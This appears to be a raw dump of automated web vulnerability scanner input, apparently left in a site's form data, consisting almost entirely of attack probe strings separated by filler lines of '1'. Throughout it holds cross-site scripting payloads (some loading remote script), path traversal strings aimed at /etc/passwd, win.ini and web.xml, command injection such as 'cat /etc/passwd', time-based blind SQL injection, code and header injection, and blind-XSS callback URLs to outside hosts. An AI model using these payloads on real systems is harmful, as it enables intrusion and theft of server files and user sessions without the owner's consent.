acux10195\xc0\xbez1\xc0\xbcz2a\x90bcxuca10195

1

................windowswin.ini

1

1

1<ScRiPt >prompt(912002)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(996648)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(930887)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?918518></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(912906)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(970887)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910088)"></g></svg>

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(964372))>

WEB-INF\web.xml

1<iframe src='data:text/html

1

1

1<body onload=prompt(970496)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943828)>

1

1

1

1<img src=xyz OnErRor=prompt(942851)>

1

1

1<img/src=">" onerror=alert(922848)>

1

1

1<ScRiPt%20>prompt(901172)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(946159) //\xf6>

1

1<input autofocus onfocus=prompt(942520)>

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_6xQeX <ScRiPt >prompt(987417)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

response.write(9724460*9499815)

'+response.write(9724460*9499815)+'

1

1

"+response.write(9724460*9499815)+"

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

${100250+99937}

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

|cat /etc/passwd#

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

)

1

1&n932853=v908889

'|'ld

-1)

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

DxUWCuzS'

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

Gx6j8aqt')

'

'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

R06S0a8x'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

"

http://hitgG5GPsHrEN.bxss.me/

-1

/etc/passwd

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

1

acunetix_wvs_invalid_filename

-1)

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://www.acunetix.tst

1

1

c8xOGPtX'

1

'&dir&'

hGszKoPs')

'"

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

DcPwWiNF'))

1'"()&%<ScRiPt >prompt(978876)</ScRiPt>

1

1

comments/.

<!--

'"()&%<ScRiPt >prompt(949124)</ScRiPt>

"&dir&"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1_965630

|dir

1

1

1

'|dir

file:///etc/passwd

1

1

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

acu6108\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6108

../../../../../../../../../../windows/win.ini

1

1

acux3983\xc0\xbez1\xc0\xbcz2a\x90bcxuca3983

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(962525)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(907148)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(931649)</ScRiPt>

1

response.write(9332049*9270052)

................windowswin.ini

1

1

1

'+response.write(9332049*9270052)+'

&cat /etc/passwd&

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989347></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(928287)</ScRiPt>

'&cat /etc/passwd&'

1

"+response.write(9332049*9270052)+"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(967199)">

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949843)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<div style=width:expression(prompt(940743))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<iframe src='data:text/html

${100158+99993}

|cat /etc/passwd#

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<body onload=prompt(931025)>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

WEB-INF/web.xml

-1

1

'|'ld

1

1&n912958=v964737

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976903)>

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1<img src=xyz OnErRor=prompt(968793)>

1

WEB-INF\web.xml

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(940736)>

)

-1))

1

testasp.vulnweb.com

vWfIhTnu'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(921724)</sCripT>

!(()&&!|*|*|

1

'

1

'"()

T61vlipj')

1&lt

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

nB9vg7l9'))

"

1

1

1

\xf6<img acu onmouseover=prompt(969243) //\xf6>

-1

/etc/passwd

'

1

1

1

1<input autofocus onfocus=prompt(965431)>

1

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

-1)

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1

&dir

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'&dir&'

1

[url=http://www.acunetix.com]website security[/url]

http://hit2LG1UaKGgQ.bxss.me/

acunetix_wvs_invalid_filename

7Du1iYTS'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

1

"&dir&"

1

2m7hx3Dd')

comments

1_2XA5G <ScRiPt >prompt(997217)</ScRiPt>

1

1

|dir

1

http://www.acunetix.tst

eQtuIoNk'))

1'"()&%<ScRiPt >prompt(958995)</ScRiPt>

1

'"

1

comments

1

1

'|dir

'"()&%<ScRiPt >prompt(980538)</ScRiPt>

1

comments/.

1

<!--

1

"|dir

1_915732

1

file:///etc/passwd

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

acu8075\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8075

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux5559\xc0\xbez1\xc0\xbcz2a\x90bcxuca5559

1

1

1

1<ScRiPt >prompt(933580)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(958999)</script>

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(988635)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996340></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(911262)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9289530*9400968)

1<video><source onerror="javascript:prompt(950858)">

1

1

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949944)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9289530*9400968)+'

'&cat /etc/passwd&'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(934640))>

"+response.write(9289530*9400968)+"

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<body onload=prompt(933942)>

1

1

1

`cat /etc/passwd`

WEB-INF/web.xml

${99124+99862}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975546)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

|cat /etc/passwd#

1

WEB-INF\web.xml

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(980157)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n950063=v994875

1

1<img/src=">" onerror=alert(918903)>

-1)

"|"ld

)

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(948881)</sCripT>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

-1))

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

1

\xf6<img acu onmouseover=prompt(900500) //\xf6>

'

^(#$!@#$)(()))******

'

XMooB0Oo'

1

1

1

1

/etc/passwd

1<input autofocus onfocus=prompt(958066)>

1

"

PHSfM5LE')

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

xmCjPTbX'))

1

||cat /etc/passwd

1

http://hitUnO0GanKVB.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

comments

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

-1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_BGpbO <ScRiPt >prompt(980310)</ScRiPt>

1

1

1

comments

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

1

-1))

1

1

http://www.acunetix.tst

comments/.

"&dir&"

1

1

dPA9M8FT'

1

1

'"

1

file:///etc/passwd

1

LmQjMvmx')

1'"()&%<ScRiPt >prompt(979426)</ScRiPt>

1

|dir

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

'|dir

'"()&%<ScRiPt >prompt(912724)</ScRiPt>

1

j5aWTA4h'))

1

1

WEB-INF/web.xml

1

1

"|dir

1

1_905046

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu9061\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9061

1

1

acux1056\xc0\xbez1\xc0\xbcz2a\x90bcxuca1056

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(944799)</ScRiPt>

1

1

................windowswin.ini

1

1

1<script>prompt(953252)</script>

1

1

1

1<ScRiPt >prompt(992372)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979680></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(970530)</ScRiPt>

1

1<video><source onerror="javascript:prompt(983911)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993633)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(988969))>

1

1

1<iframe src='data:text/html

1

1

WEB-INF/web.xml

1<body onload=prompt(903894)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928304)>

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(990651)>

1

1

1<img/src=">" onerror=alert(986001)>

1

1<ScRiPt%20>prompt(978812)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(999314) //\xf6>

1

1<input autofocus onfocus=prompt(984301)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_n2EGP <ScRiPt >prompt(968705)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

response.write(9531193*9325564)

1

'+response.write(9531193*9325564)+'

&cat /etc/passwd&

1

1

"+response.write(9531193*9325564)+"

'&cat /etc/passwd&'

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

1

1

${99242+99769}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n966445=v990514

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

-1)

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

-1))

'"()

testasp.vulnweb.com

1

1

1

1

3sG6UvmO'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

IRx28AgE')

1

1

"

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

Gf1psCES'))

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

-1

http://hit4BvN8pp30n.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

${@print(md5(acunetix_wvs_security_test))}\

&dir

-1)

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

-1))

1'"()&%<ScRiPt >prompt(917340)</ScRiPt>

'"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments/.

'"()&%<ScRiPt >prompt(985096)</ScRiPt>

R9s7jlVD'

1

"&dir&"

<!--

1

|dir

1_953243

hQ7eBGSb')

1

file:///etc/passwd

1

1

vvZI8Raf'))

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

acu8832\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8832

../../../../../../../../../../windows/win.ini.jpg

1

1

acux2741\xc0\xbez1\xc0\xbcz2a\x90bcxuca2741

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(916420)</ScRiPt>

1

1<script>prompt(903861)</script>

................windowswin.ini

1

1<ScRiPt >prompt(983471)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

response.write(9499472*9054508)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943142></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(985074)</ScRiPt>

'+response.write(9499472*9054508)+'

1

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(962370)">

"+response.write(9499472*9054508)+"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(940100)"></g></svg>

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(950841))>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

cat /etc/passwd

1

1<iframe src='data:text/html

1

1

`cat /etc/passwd`

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(961422)>

1

${99461+99803}

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1

1

'|'ld

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986343)>

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1&n974288=v922166

1<img src=xyz OnErRor=prompt(971334)>

"|"ld

)

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(912238)>

9UEsBLVu'

!(()&&!|*|*|

'"()

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(982221)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

1

'

^(#$!@#$)(()))******

wxzQKesD')

testasp.vulnweb.com

1&lt

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

\xf6<img acu onmouseover=prompt(958256) //\xf6>

1

AVnTknIF'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

1

1

1

1<input autofocus onfocus=prompt(920313)>

-1

1

1

&dir

/etc/passwd

http://hitkhph3k4vSa.bxss.me/

1

acunetix_wvs_invalid_filename

-1)

<a href='http://www.acunetix.com'>website security</a>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

'&dir&'

1

1

1

-1))

[url=http://www.acunetix.com]website security[/url]

1

http://www.acunetix.tst

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

"&dir&"

1

1_iWBzJ <ScRiPt >prompt(934580)</ScRiPt>

yCPOa3KF'

'"

1

|dir

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

<!--

Pu0XL7Kb')

1

1

1

1'"()&%<ScRiPt >prompt(941759)</ScRiPt>

'|dir

1

1

1

1

3hZJoPVP'))

1

"|dir

1

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(903824)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_977375

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

acu9521\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9521

1

..\..\..\..\..\..\..\..\windows\win.ini

response.write(9001854*9672928)

acux3180\xc0\xbez1\xc0\xbcz2a\x90bcxuca3180

1

1

'+response.write(9001854*9672928)+'

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"+response.write(9001854*9672928)+"

1<ScRiPt >prompt(986749)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1

1<script>prompt(990128)</script>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(959717)</ScRiPt>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985461></ScRiPt>

1

WEB-INF/web.xml

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<ScRiPt >prompt(948962)</ScRiPt>

../../../../../../../../../../etc/passwd

1

1

WEB-INF\web.xml

1

-1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(918873)">

1

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99139+99312}

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905796)"></g></svg>

1

`cat /etc/passwd`

-1))

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

|cat /etc/passwd#

1

9qlylC7i'

1<div style=width:expression(prompt(904234))>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n933087=v993724

)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

w0k2tpdP')

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

3zOXRpWY'))

1<body onload=prompt(964819)>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(912320)>

'"()

-1)

'

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

-1))

1

1<img src=xyz OnErRor=prompt(902978)>

1

1

1

1

"

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

F2E0OwVG'

1

1

1<img/src=">" onerror=alert(997243)>

http://hitymzTmoPXBN.bxss.me/

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

T4pfIr2N')

1

1

1

1<ScRiPt%20>prompt(941793)</sCripT>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

acunetix_wvs_invalid_filename

7rQACQMP'))

1&lt

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

\xf6<img acu onmouseover=prompt(973468) //\xf6>

1

comments

1

1

1

http://www.acunetix.tst

1

1<input autofocus onfocus=prompt(916220)>

1

'"

comments

1

1'"()&%<ScRiPt >prompt(962126)</ScRiPt>

file:///etc/passwd

"&dir&"

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(947086)</ScRiPt>

comments/.

1

<!--

1

1

1_999783

/\../\../\../\../\../\../\../etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

|dir

1

1

1

WEB-INF/web.xml

1_8j1bO <ScRiPt >prompt(977779)</ScRiPt>

1

'|dir

1

1

1

WEB-INF\web.xml

1

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu2409\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2409

1

1

1

